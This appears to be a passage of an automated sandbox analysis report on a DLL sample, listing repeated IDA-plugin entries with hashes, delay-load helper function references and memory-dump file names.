                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 193587f232dbc190f44021a77876d65bce62058869f94aabd6d5a451c563edc9
                                                                • Instruction ID: 7276a3b3956709995d58d073a3496bddb925871e90c38306544f3806d820b1f9
                                                                • Opcode Fuzzy Hash: 193587f232dbc190f44021a77876d65bce62058869f94aabd6d5a451c563edc9
                                                                • Instruction Fuzzy Hash: 76B012C62580407C330851081F02E3B07FCC0D9F10330C06EF42CC0180EB418C010473
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E51F
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: b1399d52a83c10c5b7b5ea0435f5c4c7bf7b906d844d22e50f3f11f439d16ecf
                                                                • Instruction ID: 429975eab8287438a5aee3b24c60299f324e53757631ace7b6e52ceba8a91feb
                                                                • Opcode Fuzzy Hash: b1399d52a83c10c5b7b5ea0435f5c4c7bf7b906d844d22e50f3f11f439d16ecf
                                                                • Instruction Fuzzy Hash: A8B012C62581007C330851085E03E3B02FCC0DAF10330C26EF42CC0180EB408C440472
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E580
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 10f116bd8bd597894a08f1a0f8f8a53bee067e0375e0ac083d8257ed5d550a71
                                                                • Instruction ID: 2761901832c0e2f04602223068742c4411176b509cbd7d0c1ce597fd08b0c6e8
                                                                • Opcode Fuzzy Hash: 10f116bd8bd597894a08f1a0f8f8a53bee067e0375e0ac083d8257ed5d550a71
                                                                • Instruction Fuzzy Hash: D9B012C52980047D330851541D02E3701FCC0D8B10332C06EF42CC5180EB404C000473
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E580
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: dd6c9548392ff59993bbea1be61fa37bbc0aaba2957db378976731802b96b575
                                                                • Instruction ID: c28ffc6cd0c9017493f651079eb2bdb6b2abb00d316de15832183e73b45c4ef6
                                                                • Opcode Fuzzy Hash: dd6c9548392ff59993bbea1be61fa37bbc0aaba2957db378976731802b96b575
                                                                • Instruction Fuzzy Hash: 99B012C52981007C334851545D03E3701FCC0D9B10335C26EF42CC5180EB404C400473
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E580
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 6edaa3e041d87d5bee604649c24bc0daddb66f3e9037b045ee22a231c1af3f3c
                                                                • Instruction ID: 7a73091cbac4f3a6a4b8796511ba69a0dd8125ca2fd3dd0c14838f0712a42ad3
                                                                • Opcode Fuzzy Hash: 6edaa3e041d87d5bee604649c24bc0daddb66f3e9037b045ee22a231c1af3f3c
                                                                • Instruction Fuzzy Hash: 45B012C52980007C330851555E02E3701FCC0D9B10335C26EF42CC5180EF404D010473
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 992382ea571377d9ed39fc1f885a8885ff8720eaa3fdd359b69aab794a7e98c6
                                                                • Instruction ID: 792ca69d29a0cb5af8db4e4965e6046c19e4f853f43d644f2cf878bcd77ac9fc
                                                                • Opcode Fuzzy Hash: 992382ea571377d9ed39fc1f885a8885ff8720eaa3fdd359b69aab794a7e98c6
                                                                • Instruction Fuzzy Hash: 8EA002D5259141BC7608A1515D07D3701EDC4D9B51371C56DF85AC54855A5178451871
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 242e069a439833dceaf5f399fe3c91fbb6b4bc7c8a5d6dcb300e3deecf995f70
                                                                • Instruction ID: 792ca69d29a0cb5af8db4e4965e6046c19e4f853f43d644f2cf878bcd77ac9fc
                                                                • Opcode Fuzzy Hash: 242e069a439833dceaf5f399fe3c91fbb6b4bc7c8a5d6dcb300e3deecf995f70
                                                                • Instruction Fuzzy Hash: 8EA002D5259141BC7608A1515D07D3701EDC4D9B51371C56DF85AC54855A5178451871
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 6ae7a2e9275b355f691244ad9e8f61f3b500d5ffe912839ae4007504b939fb36
                                                                • Instruction ID: 792ca69d29a0cb5af8db4e4965e6046c19e4f853f43d644f2cf878bcd77ac9fc
                                                                • Opcode Fuzzy Hash: 6ae7a2e9275b355f691244ad9e8f61f3b500d5ffe912839ae4007504b939fb36
                                                                • Instruction Fuzzy Hash: 8EA002D5259141BC7608A1515D07D3701EDC4D9B51371C56DF85AC54855A5178451871
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: d8cd1443f7264d4c657dd430f92002cfe6e5a635b93e32c03e4fd303b24e5e83
                                                                • Instruction ID: 792ca69d29a0cb5af8db4e4965e6046c19e4f853f43d644f2cf878bcd77ac9fc
                                                                • Opcode Fuzzy Hash: d8cd1443f7264d4c657dd430f92002cfe6e5a635b93e32c03e4fd303b24e5e83
                                                                • Instruction Fuzzy Hash: 8EA002D5259141BC7608A1515D07D3701EDC4D9B51371C56DF85AC54855A5178451871
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 9117c6a4f86796e7b4b7e380c4381aefbd23e801148284e8b8031e919ffe7438
                                                                • Instruction ID: 792ca69d29a0cb5af8db4e4965e6046c19e4f853f43d644f2cf878bcd77ac9fc
                                                                • Opcode Fuzzy Hash: 9117c6a4f86796e7b4b7e380c4381aefbd23e801148284e8b8031e919ffe7438
                                                                • Instruction Fuzzy Hash: 8EA002D5259141BC7608A1515D07D3701EDC4D9B51371C56DF85AC54855A5178451871
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: f9d81ce5bced08cbb91ef27d70b44eb78d0da01cd9089df685f480274a75679f
                                                                • Instruction ID: 792ca69d29a0cb5af8db4e4965e6046c19e4f853f43d644f2cf878bcd77ac9fc
                                                                • Opcode Fuzzy Hash: f9d81ce5bced08cbb91ef27d70b44eb78d0da01cd9089df685f480274a75679f
                                                                • Instruction Fuzzy Hash: 8EA002D5259141BC7608A1515D07D3701EDC4D9B51371C56DF85AC54855A5178451871
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 40721bebca576e763fa398475fe6b4b8ed87be4bac40315f5533d2370d915c08
                                                                • Instruction ID: 792ca69d29a0cb5af8db4e4965e6046c19e4f853f43d644f2cf878bcd77ac9fc
                                                                • Opcode Fuzzy Hash: 40721bebca576e763fa398475fe6b4b8ed87be4bac40315f5533d2370d915c08
                                                                • Instruction Fuzzy Hash: 8EA002D5259141BC7608A1515D07D3701EDC4D9B51371C56DF85AC54855A5178451871
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 5fb6ab0c492bad23071ac1ea70b989b429a807cc70b8d2b5cf1fd3023c3c064b
                                                                • Instruction ID: 792ca69d29a0cb5af8db4e4965e6046c19e4f853f43d644f2cf878bcd77ac9fc
                                                                • Opcode Fuzzy Hash: 5fb6ab0c492bad23071ac1ea70b989b429a807cc70b8d2b5cf1fd3023c3c064b
                                                                • Instruction Fuzzy Hash: 8EA002D5259141BC7608A1515D07D3701EDC4D9B51371C56DF85AC54855A5178451871
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 8743434aba0d78dfece21b1897fdcab0d5aadf9da2df3fa70a99c60da52202fb
                                                                • Instruction ID: 792ca69d29a0cb5af8db4e4965e6046c19e4f853f43d644f2cf878bcd77ac9fc
                                                                • Opcode Fuzzy Hash: 8743434aba0d78dfece21b1897fdcab0d5aadf9da2df3fa70a99c60da52202fb
                                                                • Instruction Fuzzy Hash: 8EA002D5259141BC7608A1515D07D3701EDC4D9B51371C56DF85AC54855A5178451871
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 2f57a2a682586720a55d89775ebc8ba53046754d777eabc82bd278a6633f2bbb
                                                                • Instruction ID: 792ca69d29a0cb5af8db4e4965e6046c19e4f853f43d644f2cf878bcd77ac9fc
                                                                • Opcode Fuzzy Hash: 2f57a2a682586720a55d89775ebc8ba53046754d777eabc82bd278a6633f2bbb
                                                                • Instruction Fuzzy Hash: 8EA002D5259141BC7608A1515D07D3701EDC4D9B51371C56DF85AC54855A5178451871
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 5e722aa08945c762673a9afff3d206b98272ae3bc4cd68b50ea8c14e4d5e9a73
                                                                • Instruction ID: 792ca69d29a0cb5af8db4e4965e6046c19e4f853f43d644f2cf878bcd77ac9fc
                                                                • Opcode Fuzzy Hash: 5e722aa08945c762673a9afff3d206b98272ae3bc4cd68b50ea8c14e4d5e9a73
                                                                • Instruction Fuzzy Hash: 8EA002D5259141BC7608A1515D07D3701EDC4D9B51371C56DF85AC54855A5178451871
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E3FC
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
